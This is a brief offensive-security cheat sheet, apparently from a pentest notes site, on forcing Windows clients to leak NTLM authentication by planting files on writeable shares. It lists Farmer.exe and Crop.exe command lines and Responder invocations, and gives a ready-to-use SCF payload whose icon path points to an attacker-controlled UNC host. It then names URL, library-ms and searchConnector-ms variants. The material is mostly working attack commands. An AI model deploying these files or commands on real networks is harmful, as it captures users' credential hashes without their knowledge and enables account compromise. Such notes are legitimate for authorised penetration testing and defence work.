Client Attacks

SCF and URL file attack against writeable share

Theses attacks can be automated with Farmer.exearrow-up-right and Crop.exearrow-up-right

# Farmer to receive auth
farmer.exe <port> [seconds] [output]
farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
farmer.exe 8888 60 # one minute

# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options]
Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec

SCF Files

Drop the following @something.scf file inside a share and start listening with Responder : responder -wrf --lm -v -I eth0

[Shell]
Command=2
IconFile=\\10.10.10.10\Share\test.ico
[Taskbar]
Command=ToggleDesktop

Using crackmapexecarrow-up-right:

URL Files

This attack also works with .url files and responder -I eth0 -v.

Windows Library Files

Windows Library Files (.library-ms)

Windows Search Connectors Files

Windows Search Connectors (.searchConnector-ms)

Last updated